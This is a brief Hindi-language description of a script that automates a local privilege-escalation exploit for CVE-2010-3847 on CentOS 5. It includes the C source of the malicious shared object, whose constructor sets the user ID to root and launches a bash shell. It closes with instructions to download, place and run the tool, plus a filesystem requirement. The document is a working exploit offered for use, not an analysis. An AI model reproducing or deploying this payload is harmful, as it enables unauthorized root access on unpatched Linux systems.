
CVE-2010-3847 का लाभ उठाने के लिए स्क्रिप्ट
इस उपकरण का उद्देश्य [http://marc.info/?l=full-disclosure&m=128776663124692&w=2] में चर्चित शोषण को स्वचालित करना है। CentOS 5 x86 पर परीक्षित।
इसके द्वारा आउटपुट किया गया DSO निम्नलिखित कोड से संकलित होता है:
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
इसे डाउनलोड करें, इसे निष्पादन योग्य स्थान पर रखें, और चलाएँ।
/tmp और जहाँ भी ping है, एक ही फाइलसिस्टम पर होना चाहिए। यदि नहीं, तो पथों को तदनुसार समायोजित करें।